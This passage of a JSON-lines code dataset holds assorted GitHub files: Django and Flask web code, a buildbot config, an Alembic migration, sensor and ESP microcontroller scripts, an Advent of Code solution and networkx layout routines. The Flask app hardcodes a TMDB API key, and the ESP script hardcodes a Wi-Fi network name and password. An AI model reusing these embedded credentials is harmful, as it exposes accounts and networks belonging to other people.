self.do_curation(last_run)\n\n def do_curation(self, last_run: arrow.Arrow):\n submitted = set()\n\n qs = Tag.objects.filter(\n date_modified__gte=last_run.datetime,\n )\n\n total = qs.count()\n logger.info('Found %s tags eligible for automatic curation', total)\n\n for row in qs:\n if row.id in submitted:\n continue\n\n matches = list(\n Tag.objects.filter(\n name__iexact=row.name,\n ).order_by('-date_modified').values_list('id', flat=True)\n )\n\n if len(matches) > 1:\n submitted = submitted.union(set(matches))\n CurateItemTask().apply_async((self.config.label, self.started_by.id, matches,))\n","repo_name":"pattisdr/SHARE","sub_path":"bots/autocuratetag/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"26610481321","text":"#!/usr/bin/env python\n# vi: set ft=python :\n\nimport os\nfrom twisted.application import service\nfrom buildbot.master import BuildMaster\n\n## bbmaster settings\nbbmaster_basedir = os.path.abspath(os.path.dirname(__file__))\nbbmaster_logdir = os.path.join(bbmaster_basedir, 'twistd.log')\nbbmaster_rotate_length = '10000000'\nbbmaster_max_rotated_files = '10'\nbbmaster_configfile = 'master.cfg'\nbbmaster_umask = None\n\n## create the application\napplication = service.Application('buildmaster')\n\n## add logging\ntry:\n from twisted.python.logfile import LogFile\n from twisted.python.log import ILogObserver, FileLogObserver\n logfile = LogFile.fromFullPath(bbmaster_logdir,\n rotateLength=bbmaster_rotate_length,\n maxRotatedFiles=bbmaster_max_rotated_files)\n application.setComponent(ILogObserver, FileLogObserver(logfile).emit)\nexcept ImportError:\n pass\n\n## create the master\nm = BuildMaster(bbmaster_basedir, bbmaster_configfile, bbmaster_umask)\nm.setServiceParent(application)\nm.log_rotation.rotateLength = bbmaster_rotate_length\nm.log_rotation.maxRotatedFiles = bbmaster_max_rotated_files\n","repo_name":"mhubig/globelog2-bbmaster","sub_path":"master/buildbot.tac","file_name":"buildbot.tac","file_ext":"tac","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6378453250","text":"#! /usr/bin/env python\n\nimport os\nimport ibis\nimport pandas as pd\n\ndef get_postgres_creds():\n kwargs = {\n 'host': os.environ['PGHOST'],\n 'user': os.environ['PGUSER'],\n 'password': os.environ['PGPASSWORD'],\n 'database': os.environ['PGDATABASE']\n }\n return kwargs\n\n\ndef get_postgres_ibis_connection():\n kwargs = get_postgres_creds()\n conn = ibis.postgres.connect(**kwargs)\n return conn\n\n\nconn = get_postgres_ibis_connection()\nconn.raw_sql(\"drop table if exists test\")\n\nconn.raw_sql(\"create table test (id bigserial primary key, x float)\")\n\nfor nn in range(10):\n df = pd.DataFrame({'x': [1., 2., 3.]})\n conn.insert('test', df)\n\nt = conn.table('test')\nprint()\nprint(t.execute().to_string())\n","repo_name":"robdmc/ibis_pg_test","sub_path":"doit.py","file_name":"doit.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7474224915","text":"\"\"\"\nAdvent Of Code 2021\nDay 6: Lanternfish part 1 & 2\n\nhttps://adventofcode.com/2021/day/6 \n\"\"\"\nimport os\n\ndef readInput(filename):\n with open(os.path.join(\"2021\", \"D06\", filename)) as f:\n lines = f.readlines()\n input = [int(i) for i in lines[0].strip('\\n').split(',')]\n return tuple(input)\n\ndef countFish(flock, numberOfDay):\n firstGeneration = list(flock)\n newGenerations = []\n for _ in range(numberOfDay):\n newFishCount = 0\n for i in range(len(firstGeneration)):\n if firstGeneration[i] > 0:\n firstGeneration[i] -= 1\n else:\n firstGeneration[i] = 6\n newFishCount += 1\n\n # one generation grow and reproduce at the same rate\n for ng in newGenerations:\n if ng[1] > 0:\n ng[1] -= 1\n else:\n ng[1] = 6\n newFishCount += ng[0]\n\n newGenerations.append([newFishCount, 8])\n\n fishCount = len(firstGeneration)\n fishCount += sum(map(lambda x: x[0], newGenerations))\n return fishCount\n\nsample = [3, 4, 3, 1, 2]\ninput = readInput(\"d6-input.txt\")\nprint(f\"Part 1, sample with 18 days: {countFish(sample, 18)}\")\nprint(f\"Part 1, sample with 80 days: {countFish(sample, 80)}\")\nprint(f\"Part 1, puzzle input with 80 days: {countFish(input, 80)}\")\n\nprint(f\"Part 2, sample with 256 days: {countFish(sample, 256)}\")\nprint(f\"Part 2, puzzle input with 256 days: {countFish(input, 256)}\")\n","repo_name":"lionel-lbr/adventofcode","sub_path":"2021/D06/d6.py","file_name":"d6.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9119654876","text":"from rest_framework import serializers\nimport random\nfrom .models import Scoreline, Tournament, Team, Player, Match\n\n\nclass TournamentSerializer(serializers.ModelSerializer):\n name = serializers.CharField(max_length=100, required=True)\n def create(self, validated_data):\n # Once the request data has been validated, we can create a todo item instance in the database\n T = Tournament.objects.create(name=validated_data.get('name'))\n for team in Team.objects.all():\n if team.name != 'Uncapped':\n T.team_set.add(team)\n team.save()\n return T\n def post(self, instance, data):\n I = data.get('Schedule')\n try:\n i = int(I)\n except:\n return instance\n if(i):\n instance.setschedule()\n instance.save()\n return instance\n def update(self, instance, validated_data):\n # Once the request data has been validated, we can update the todo item instance in the database\n instance.name = validated_data.get('name', instance.name)\n instance.save()\n return instance\n\n class Meta:\n model = Tournament\n fields = (\n 'id',\n 'name',\n 'match_num',\n 'scheduled',\n 'completed',\n 'team_set',\n 'match_set',\n )\nclass TeamSerializer(serializers.ModelSerializer):\n name = serializers.CharField(max_length=100, required=True)\n captain_name = serializers.SerializerMethodField('capname')\n wicketkeeper_name = serializers.SerializerMethodField('wicname')\n def capname(self, instance):\n return instance.player_set.all()[instance.captain].name\n def wicname(self, instance):\n return instance.player_set.all()[instance.wicketkeeper].name\n def create(self, validated_data):\n U = Team.objects.get(name='Uncapped')\n if U.player_set.count() < 11:\n return U\n else:\n T = Team.objects.create(name=validated_data.get('name'))\n if(str(validated_data.get('tournament')) != \"None\"):\n T.tournament = validated_data.get('tournament')\n else:\n pass\n for i in range(11):\n #print(\"Hi\")\n try:\n #print(U.player_set.all()[0])\n T.player_set.add(U.player_set.all()[0])\n T.save()\n U.player_set.all()[0].save()\n U.save()\n except:\n return U\n T.save()\n T.captain = random.randint(0,T.player_set.count() - 1)\n T.wicketkeeper = random.randint(0,T.player_set.count() - 1)\n T.save()\n return T\n def update(self, instance, validated_data):\n if(str(validated_data.get('name')) != \"None\"):\n instance.name = validated_data.get('name')\n else:\n pass\n instance.save()\n if(str(validated_data.get('tournament')) != \"None\"):\n instance.tournament = validated_data.get('tournament')\n else:\n pass\n instance.save()\n return instance\n\n class Meta:\n model = Team\n fields = [\n 'id',\n 'tournament',\n 'name',\n 'player_set',\n 'captain_name',\n 'wicketkeeper_name',\n 'win',\n 'loss',\n 'DNR',\n ]\nclass PlayerSerializer(serializers.ModelSerializer):\n name = serializers.CharField(max_length=100, required=True)\n def create(self, validated_data):\n T = Player.objects.create(name=validated_data.get('name'),age = validated_data.get('age'),role = validated_data.get('role'))\n if(str(validated_data.get('team')) != \"None\"):\n T.team = validated_data.get('team')\n else:\n pass\n if(str(validated_data.get('bat')) != \"None\"):\n T.bathandedness = str(validated_data.get('bat'))\n else:\n pass\n if(str(validated_data.get('ball')) != \"None\"):\n T.ballhandedness = validated_data.get('ball')\n else:\n pass\n T.save()\n if(str(validated_data.get('specs')) != \"None\"):\n T.specifics = validated_data.get('specs')\n else:\n T.specifics = 'None'\n T.save()\n return T\n def update(self, instance, validated_data):\n instance.name = validated_data.get('name', instance.name)\n instance.age = validated_data.get('age', instance.age)\n instance.team = validated_data.get('team', instance.team)\n instance.bathandedness = validated_data.get('bat', instance.bathandedness)\n instance.ballhandedness = validated_data.get('ball', instance.ballhandedness)\n instance.specifics = validated_data.get('specs', instance.soecifics)\n instance.role = validated_data.get('role', instance.role)\n instance.save()\n return instance\n class Meta:\n model = Player\n fields = (\n 'id',\n 'name',\n 'age',\n 'team',\n 'bathandedness',\n 'ballhandedness',\n 'specifics',\n 'role',\n '_1Ccount',\n '_5wcount',\n 'runcount',\n 'wickount',\n 'catcount',\n '_50count',\n )\nclass MatchSerializer(serializers.ModelSerializer):\n team_names = serializers.SerializerMethodField('team_name')\n scoreline_set = serializers.SerializerMethodField('scorer')\n def team_name(self, instance):\n L = []\n for i in instance.playing11_set.all():\n L.append(i.team.name)\n return L\n def scorer(self, instance):\n L = []\n for i in instance.playing11_set.all():\n M = []\n for j in i.scoreline_set.all():\n S = []\n for k in j.playerinline_set.all():\n S.append((k.player.name,k.role))\n M.append(S)\n M.append([j.run, j.ballfaced, j.out, j.outdesc])\n L.append(M)\n return L\n def update(self, instance):\n instance.generate()\n instance.save()\n return instance\n class Meta:\n model = Match\n fields = (\n 'id',\n 'date',\n 'winner',\n 'result',\n 'tournament',\n 'scoreline_set',\n 'playing11_set',\n 'team_names',\n )\nclass StatSerializer(serializers.ModelSerializer):\n class Meta:\n model = Player\n fields = (\n 'id',\n 'name',\n 'age',\n 'team',\n 'bathandedness',\n 'ballhandedness',\n 'specifics',\n 'role',\n '_1Ccount',\n '_5wcount',\n 'runcount',\n 'wickount',\n 'catcount',\n '_50count',\n )\n","repo_name":"chirag-ghosh/rickly","sub_path":"backend/team/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":6910,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"35771128377","text":"from flask import Flask, render_template\nimport requests\n\nfrom model.media import Movie\nfrom model.video import Video\n\napp = Flask(__name__)\n\nURL = 'https://api.themoviedb.org/'\nPARAMS = {'api_key': '60dbe1af2d9d27a66e65f26e2ec0db7a', 'page': 1}\n\n#list of movies cached in global variables to avoid reloading api\nmoviesTopRated = []\nmoviesPopular = []\nmoviesNowPlaying = []\nmoviesUpcoming = []\n\n#movie id and video dictionary cache\ntrailerKeysDict = {}\n\n\n@app.route('/')\n@app.route('/home/')\ndef home():\n global moviesTopRated\n if len(moviesTopRated) == 0: #if list has no items cached, load movies\n moviesTopRated = getMovies('3/movie/top_rated/')\n return render_template('index.html', movies=moviesTopRated, pageHeading='Top Rated')\n\n\n@app.route('/popular/')\ndef popular():\n global moviesPopular\n if len(moviesPopular) == 0: #if list has no items cached, load movies\n moviesPopular = getMovies('3/movie/popular/')\n return render_template('index.html', movies=moviesPopular, pageHeading='Popular')\n\n\n@app.route('/now/')\ndef now_playing():\n global moviesNowPlaying\n if len(moviesNowPlaying) == 0: #if list has no items cached, load movies\n moviesNowPlaying = getMovies('3/movie/now_playing/')\n return render_template('index.html', movies=moviesNowPlaying, pageHeading='Now Playing')\n\n\n@app.route('/upcoming/')\ndef upcoming():\n global moviesUpcoming\n if len(moviesUpcoming) == 0: #if list has no items cached, load movies\n moviesUpcoming = getMovies('3/movie/upcoming/')\n return render_template('index.html', movies=moviesUpcoming, pageHeading='Upcoming')\n\n\n@app.route('/trailer/')\ndef loadTrailer(id):\n global trailerKeysDict\n if (id not in trailerKeysDict): #if dict does not have this id as key, load data\n tRequest = requests.get(url=URL + '3/movie/' + str(id) + '/videos', params=PARAMS)\n data = tRequest.json()['results']\n for item in data:\n if (item['site'] == 'YouTube'): #make sute its a youtube result\n trailerKeysDict[id] = Video(item['id'], item['key'], item['name'], item['site'], item['type']) #add Video item in dictionary with respective id as key\n return render_template('trailer.html', video=trailerKeysDict[id])\n return '

Oops, No trailer found!

' #if api returned empty results\n\n\ndef getMovies(route):\n request = requests.get(url=URL + route, params=PARAMS)\n data = request.json()['results']\n movies = [] #list of movies to be returned\n for item in data:\n movies.append(Movie(item['id'], item['title'], item['poster_path'], item['overview'], item['vote_average'])) #add movie item to list\n return movies\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"amansharma93/Movie-Trailer-Website","sub_path":"launcher.py","file_name":"launcher.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"2755924399","text":"\"\"\"\nBecause GET requests can't have bodies, and we need one to filter the results of the list\naction, the standard CRUD routes are redefined here to support this.\n\nOriginal definitions: rest_framework/routers.py\n\"\"\"\nfrom rest_framework.routers import Route\n\n# The standard CRUD routes\nSTANDARD_CRUD_ROUTES = [\n # List route.\n Route(\n url=r'^{prefix}/list{trailing_slash}$',\n mapping={\n 'post': 'list'\n },\n name='{basename}-list',\n detail=False,\n initkwargs={'suffix': 'List'}\n ),\n # Create route.\n Route(\n url=r'^{prefix}/create{trailing_slash}$',\n mapping={\n 'post': 'create'\n },\n name='{basename}-create',\n detail=False,\n initkwargs={'suffix': 'List'}\n ),\n # Detail route.\n Route(\n url=r'^{prefix}/{lookup}{trailing_slash}$',\n mapping={\n 'get': 'retrieve',\n 'put': 'update',\n 'patch': 'partial_update',\n 'delete': 'destroy'\n },\n name='{basename}-detail',\n detail=True,\n initkwargs={'suffix': 'Instance'}\n )\n]\n","repo_name":"waikato-ufdl/ufdl-backend","sub_path":"ufdl-core-app/src/ufdl/core_app/routers/_standard_routes.py","file_name":"_standard_routes.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"6104944882","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n # locations\n path(\"location\", views.LocationList.as_view()),\n path(\"location/\", views.LocationDetail.as_view()),\n # iseeya_users \n path(\"iseeya_user\", views.ISeeYaUserList.as_view()),\n path(\"iseeya_user/\", views.ISeeYaUserDetail.as_view()),\n # profiles\n path(\"profile\", views.ProfileList.as_view()),\n path(\"profile/\", views.ProfileDetail.as_view()),\n # iseeya_maps\n path(\"iseeya_map\", views.ISeeYaMapList.as_view()),\n path(\"iseeya_map/\", views.ISeeYaMapDetail.as_view()),\n # marker\n path(\"marker\", views.MarkerList.as_view()),\n path(\"marker/\", views.MarkerDetail.as_view()),\n # users\n path(\"get_iseeya_user\", views.get_iseeya_user)\n]","repo_name":"jmacach1/social_media_backend","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5885338590","text":"# Elias Zell\n# Crash 1\n\nimport time \nimport digitalio \nimport board \nimport adafruit_mpu6050\nimport busio\n\nsda_pin = board.GP14\nscl_pin = board.GP15\ni2c = busio.I2C(scl_pin, sda_pin)\n\nmpu = adafruit_mpu6050.MPU6050(i2c) \n\nmpu.acceleration \nmpu.gyro\n\nwhile True: \n \n print(f\"X Acceleration: {mpu.acceleration[0]} m/s2\") #Print the X coordinate of the accelerometer\n print(f\"Y Acceleration: {mpu.acceleration[1]} m/s2\") #Print the Y coordinate of the accelerometer\n print(f\"Z Acceleration: {mpu.acceleration[2]} m/s2\") #Print the Z coordinate of the accelerometer\n print(\"\") \n \n print(\"\") #Prints everything you just wrote above \n time.sleep(1) ","repo_name":"ezell38/Engineering_4_Notebook","sub_path":"raspberry-pi/Crash_1.py","file_name":"Crash_1.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37272188815","text":"from io import StringIO\n\nfrom django.core.management import call_command\nfrom django.test import TestCase\n\nfrom django_celery_beat.models import PeriodicTask\n\nfrom .factories import SafeFundingFactory\n\n\nclass TestCommands(TestCase):\n def test_check_safes(self):\n buf = StringIO()\n call_command('check_safes', stdout=buf)\n self.assertIn('All safes are deployed', buf.getvalue())\n\n safe_funding = SafeFundingFactory(safe_deployed=False)\n call_command('check_safes', stdout=buf)\n self.assertIn('Safe=%s Status=%s' % (safe_funding.safe_id, safe_funding.status()),\n buf.getvalue())\n\n def test_deploy_pending_safes(self):\n buf = StringIO()\n call_command('deploy_pending_safes', stdout=buf)\n self.assertIn('All safes are deployed', buf.getvalue())\n\n def test_deploy_safe_contracts(self):\n buf = StringIO()\n call_command('deploy_safe_contracts', stdout=buf)\n self.assertEqual(buf.getvalue().count('Contract has been deployed on'), 3)\n\n def test_send_slack_notification(self):\n buf = StringIO()\n call_command('send_slack_notification', stdout=buf)\n text = buf.getvalue()\n self.assertIn('Slack not configured, ignoring', text)\n self.assertIn('Starting Safe Relay Service version', text)\n\n def test_setup_service(self):\n from ..management.commands.setup_service import Command\n number_tasks = len(Command.tasks)\n self.assertEqual(PeriodicTask.objects.all().count(), 0)\n call_command('setup_service')\n self.assertEqual(PeriodicTask.objects.all().count(), number_tasks)\n","repo_name":"vaporyorg/safe-relay-service","sub_path":"safe_relay_service/relay/tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72093307921","text":"import network\r\nimport time\r\nimport gc\r\n\r\nsta_if = network.WLAN(network.STA_IF)\r\nsta_if.active(True)\r\n#sta_if.scan() # Scan for available access points\r\nsta_if.connect(\"fablab-wue\", \"cwurzdfi\") # Connect to an AP\r\nwhile not sta_if.isconnected(): # Check for successful connection\r\n time.sleep(0.5)\r\n print ('Waiting for connection...')\r\n\r\nprint ('Connected!')\r\n\r\ngc.collect()\r\nprint (gc.mem_free())\r\n","repo_name":"fablab-wue/ezPiC.Device.OLD","sub_path":"esp/ESP.py","file_name":"ESP.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"13604549216","text":"\"\"\"Initial\n\nRevision ID: 14e832752423\nRevises: None\nCreate Date: 2022-09-14 15:30:49.539549\n\n\"\"\"\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n# revision identifiers, used by Alembic.\nrevision = '14e832752423'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n 'history',\n sa.Column('uid', sa.String(), nullable=False),\n sa.Column('size', sa.Integer(), nullable=False),\n sa.Column('update_date', sa.DateTime(), nullable=False),\n sa.UniqueConstraint(\n 'uid', 'update_date',\n name='uix_obj_history_change'\n )\n )\n op.create_table(\n 'relations',\n sa.Column('relation_id', sa.String(), nullable=False),\n sa.Column('children_id', sa.String(), nullable=False),\n sa.PrimaryKeyConstraint(\n 'relation_id',\n 'children_id',\n name=op.f('pk__relations')\n ),\n sa.UniqueConstraint(\n 'relation_id',\n 'children_id',\n name='uix_pair_children_parent'\n )\n )\n op.create_table(\n 'units',\n sa.Column('uid', sa.String(), nullable=False),\n sa.Column('url', sa.String(), nullable=True),\n sa.Column('date', sa.DateTime(), nullable=False),\n sa.Column(\n 'type', sa.Enum('file', 'folder', name='type'), nullable=False),\n sa.Column('size', sa.Integer(), nullable=True),\n sa.Column('parent_id', sa.String(), nullable=True),\n sa.PrimaryKeyConstraint('uid', name=op.f('pk__units'))\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n pass\n # ### end Alembic commands ###\n","repo_name":"AlexandrVino/BackendSchoolAutumn2022","sub_path":"disk/db/migrations/versions/14e832752423_initial.py","file_name":"14e832752423_initial.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19236031932","text":"import networkx as nx\n__author__ = \"\"\"Aric Hagberg (hagberg@lanl.gov)\\nDan Schult(dschult@colgate.edu)\"\"\"\n__all__ = ['circular_layout',\n 'random_layout',\n 'shell_layout',\n 'spring_layout',\n 'spectral_layout',\n 'fruchterman_reingold_layout']\n\ndef random_layout(G,dim=2):\n \"\"\"Position nodes uniformly at random in the unit square.\n\n For every node, a position is generated by choosing each of dim\n coordinates uniformly at random on the interval [0.0, 1.0).\n\n NumPy (http://scipy.org) is required for this function.\n\n Parameters\n ----------\n G : NetworkX graph\n A position will be assigned to every node in G.\n\n dim : int\n Dimension of layout.\n\n Returns\n -------\n dict :\n A dictionary of positions keyed by node\n\n Examples\n --------\n >>> G = nx.lollipop_graph(4, 3)\n >>> pos = nx.random_layout(G)\n\n \"\"\"\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"random_layout() requires numpy: http://scipy.org/ \")\n n=len(G)\n pos=np.asarray(np.random.random((n,dim)),dtype=np.float32)\n return dict(zip(G,pos))\n\n\ndef circular_layout(G, dim=2, scale=1):\n # dim=2 only\n \"\"\"Position nodes on a circle.\n\n Parameters\n ----------\n G : NetworkX graph\n\n dim : int\n Dimension of layout, currently only dim=2 is supported\n\n scale : float\n Scale factor for positions\n\n Returns\n -------\n dict :\n A dictionary of positions keyed by node\n\n Examples\n --------\n >>> G=nx.path_graph(4)\n >>> pos=nx.circular_layout(G)\n\n Notes\n ------\n This algorithm currently only works in two dimensions and does not\n try to minimize edge crossings.\n\n \"\"\"\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"circular_layout() requires numpy: http://scipy.org/ \")\n if len(G)==0:\n return {}\n if len(G)==1:\n return {G.nodes()[0]:(1,)*dim}\n t=np.arange(0,2.0*np.pi,2.0*np.pi/len(G),dtype=np.float32)\n pos=np.transpose(np.array([np.cos(t),np.sin(t)]))\n pos=_rescale_layout(pos,scale=scale)\n return dict(zip(G,pos))\n\ndef shell_layout(G,nlist=None,dim=2,scale=1):\n \"\"\"Position nodes in concentric circles.\n\n Parameters\n ----------\n G : NetworkX graph\n\n nlist : list of lists\n List of node lists for each shell.\n\n dim : int\n Dimension of layout, currently only dim=2 is supported\n\n scale : float\n Scale factor for positions\n\n Returns\n -------\n dict :\n A dictionary of positions keyed by node\n\n Examples\n --------\n >>> G=nx.path_graph(4)\n >>> shells=[[0],[1,2,3]]\n >>> pos=nx.shell_layout(G,shells)\n\n Notes\n ------\n This algorithm currently only works in two dimensions and does not\n try to minimize edge crossings.\n\n \"\"\"\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"shell_layout() requires numpy: http://scipy.org/ \")\n if len(G)==0:\n return {}\n if len(G)==1:\n return {G.nodes()[0]:(1,)*dim}\n if nlist==None:\n nlist=[G.nodes()] # draw the whole graph in one shell\n\n if len(nlist[0])==1:\n radius=0.0 # single node at center\n else:\n radius=1.0 # else start at r=1\n\n npos={}\n for nodes in nlist:\n t=np.arange(0,2.0*np.pi,2.0*np.pi/len(nodes),dtype=np.float32)\n pos=np.transpose(np.array([radius*np.cos(t),radius*np.sin(t)]))\n npos.update(zip(nodes,pos))\n radius+=1.0\n\n # FIXME: rescale\n return npos\n\n\ndef fruchterman_reingold_layout(G,dim=2,\n pos=None,\n fixed=None,\n iterations=50,\n weight='weight',\n scale=1):\n \"\"\"Position nodes using Fruchterman-Reingold force-directed algorithm. \n\n Parameters\n ----------\n G : NetworkX graph\n\n dim : int\n Dimension of layout\n\n pos : dict or None optional (default=None)\n Initial positions for nodes as a dictionary with node as keys\n and values as a list or tuple. If None, then nuse random initial\n positions.\n\n fixed : list or None optional (default=None)\n Nodes to keep fixed at initial position.\n\n iterations : int optional (default=50)\n Number of iterations of spring-force relaxation\n\n weight : string or None optional (default='weight')\n The edge attribute that holds the numerical value used for\n the edge weight. If None, then all edge weights are 1.\n\n scale : float\n Scale factor for positions\n\n Returns\n -------\n dict :\n A dictionary of positions keyed by node\n\n Examples\n --------\n >>> G=nx.path_graph(4)\n >>> pos=nx.spring_layout(G)\n\n # The same using longer function name\n >>> pos=nx.fruchterman_reingold_layout(G)\n \"\"\"\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"fruchterman_reingold_layout() requires numpy: http://scipy.org/ \")\n if fixed is not None:\n nfixed=dict(zip(G,range(len(G))))\n fixed=np.asarray([nfixed[v] for v in fixed])\n\n if pos is not None:\n pos_arr=np.asarray(np.random.random((len(G),dim)))\n for i,n in enumerate(G):\n if n in pos:\n pos_arr[i]=np.asarray(pos[n])\n else:\n pos_arr=None\n\n if len(G)==0:\n return {}\n if len(G)==1:\n return {G.nodes()[0]:(1,)*dim}\n\n try:\n # Sparse matrix\n if len(G) < 500: # sparse solver for large graphs\n raise ValueError\n A=nx.to_scipy_sparse_matrix(G,weight=weight)\n pos=_sparse_fruchterman_reingold(A,dim,pos_arr,fixed,iterations)\n except:\n A=nx.to_numpy_matrix(G,weight=weight)\n pos=_fruchterman_reingold(A,dim,pos_arr,fixed,iterations)\n if fixed is None:\n pos=_rescale_layout(pos,scale=scale)\n return dict(zip(G,pos))\n\nspring_layout=fruchterman_reingold_layout\n\ndef _fruchterman_reingold(A, dim=2, pos=None, fixed=None, iterations=50):\n # Position nodes in adjacency matrix A using Fruchterman-Reingold\n # Entry point for NetworkX graph is fruchterman_reingold_layout()\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"_fruchterman_reingold() requires numpy: http://scipy.org/ \")\n\n try:\n nnodes,_=A.shape\n except AttributeError:\n raise nx.NetworkXError(\n \"fruchterman_reingold() takes an adjacency matrix as input\")\n\n A=np.asarray(A) # make sure we have an array instead of a matrix\n\n if pos==None:\n # random initial positions\n pos=np.asarray(np.random.random((nnodes,dim)),dtype=A.dtype)\n else:\n # make sure positions are of same type as matrix\n pos=pos.astype(A.dtype)\n\n # optimal distance between nodes\n k=np.sqrt(1.0/nnodes)\n # the initial \"temperature\" is about .1 of domain area (=1x1)\n # this is the largest step allowed in the dynamics.\n t=0.1\n # simple cooling scheme.\n # linearly step down by dt on each iteration so last iteration is size dt.\n dt=t/float(iterations+1)\n delta = np.zeros((pos.shape[0],pos.shape[0],pos.shape[1]),dtype=A.dtype)\n # the inscrutable (but fast) version\n # this is still O(V^2)\n # could use multilevel methods to speed this up significantly\n for iteration in range(iterations):\n # matrix of difference between points\n for i in range(pos.shape[1]):\n delta[:,:,i]= pos[:,i,None]-pos[:,i]\n # distance between points\n distance=np.sqrt((delta**2).sum(axis=-1))\n # enforce minimum distance of 0.01\n distance=np.where(distance<0.01,0.01,distance)\n # displacement \"force\"\n displacement=np.transpose(np.transpose(delta)*\\\n (k*k/distance**2-A*distance/k))\\\n .sum(axis=1)\n # update positions\n length=np.sqrt((displacement**2).sum(axis=1))\n length=np.where(length<0.01,0.1,length)\n delta_pos=np.transpose(np.transpose(displacement)*t/length)\n if fixed is not None:\n # don't change positions of fixed nodes\n delta_pos[fixed]=0.0\n pos+=delta_pos\n # cool temperature\n t-=dt\n\n return pos\n\n\ndef _sparse_fruchterman_reingold(A, dim=2, pos=None, fixed=None, iterations=50):\n # Position nodes in adjacency matrix A using Fruchterman-Reingold \n # Entry point for NetworkX graph is fruchterman_reingold_layout()\n # Sparse version\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"_sparse_fruchterman_reingold() requires numpy: http://scipy.org/ \")\n try:\n nnodes,_=A.shape\n except AttributeError:\n raise nx.NetworkXError(\n \"fruchterman_reingold() takes an adjacency matrix as input\")\n try:\n from scipy.sparse import spdiags,coo_matrix\n except ImportError:\n raise ImportError(\"_sparse_fruchterman_reingold() scipy numpy: http://scipy.org/ \")\n # make sure we have a LIst of Lists representation\n try:\n A=A.tolil()\n except:\n A=(coo_matrix(A)).tolil()\n\n if pos==None:\n # random initial positions\n pos=np.asarray(np.random.random((nnodes,dim)),dtype=A.dtype)\n else:\n # make sure positions are of same type as matrix\n pos=pos.astype(A.dtype)\n\n # no fixed nodes\n if fixed==None:\n fixed=[]\n\n # optimal distance between nodes\n k=np.sqrt(1.0/nnodes)\n # the initial \"temperature\" is about .1 of domain area (=1x1)\n # this is the largest step allowed in the dynamics.\n t=0.1\n # simple cooling scheme.\n # linearly step down by dt on each iteration so last iteration is size dt.\n dt=t/float(iterations+1)\n\n displacement=np.zeros((dim,nnodes))\n for iteration in range(iterations):\n displacement*=0\n # loop over rows\n for i in range(A.shape[0]):\n if i in fixed:\n continue\n # difference between this row's node position and all others\n delta=(pos[i]-pos).T\n # distance between points\n distance=np.sqrt((delta**2).sum(axis=0))\n # enforce minimum distance of 0.01\n distance=np.where(distance<0.01,0.01,distance)\n # the adjacency matrix row\n Ai=np.asarray(A.getrowview(i).toarray())\n # displacement \"force\"\n displacement[:,i]+=\\\n (delta*(k*k/distance**2-Ai*distance/k)).sum(axis=1)\n # update positions\n length=np.sqrt((displacement**2).sum(axis=0))\n length=np.where(length<0.01,0.1,length)\n pos+=(displacement*t/length).T\n # cool temperature\n t-=dt\n\n return pos\n\n\ndef spectral_layout(G, dim=2, weight='weight', scale=1):\n \"\"\"Position nodes using the eigenvectors of the graph Laplacian. \n\n Parameters\n ----------\n G : NetworkX graph\n\n dim : int\n Dimension of layout\n\n weight : string or None optional (default='weight')\n The edge attribute that holds the numerical value used for\n the edge weight. If None, then all edge weights are 1.\n\n scale : float\n Scale factor for positions\n\n Returns\n -------\n dict :\n A dictionary of positions keyed by node\n\n Examples\n --------\n >>> G=nx.path_graph(4)\n >>> pos=nx.spectral_layout(G)\n\n Notes\n -----\n Directed graphs will be considered as unidrected graphs when\n positioning the nodes.\n\n For larger graphs (>500 nodes) this will use the SciPy sparse\n eigenvalue solver (ARPACK).\n \"\"\"\n # handle some special cases that break the eigensolvers\n try:\n import numpy as np\n except ImportError:\n raise ImportError(\"spectral_layout() requires numpy: http://scipy.org/ \")\n if len(G)<=2:\n if len(G)==0:\n pos=np.array([])\n elif len(G)==1:\n pos=np.array([[1,1]])\n else:\n pos=np.array([[0,0.5],[1,0.5]])\n return dict(zip(G,pos))\n try:\n # Sparse matrix\n if len(G)< 500: # dense solver is faster for small graphs\n raise ValueError\n A=nx.to_scipy_sparse_matrix(G, weight=weight,dtype='f')\n # 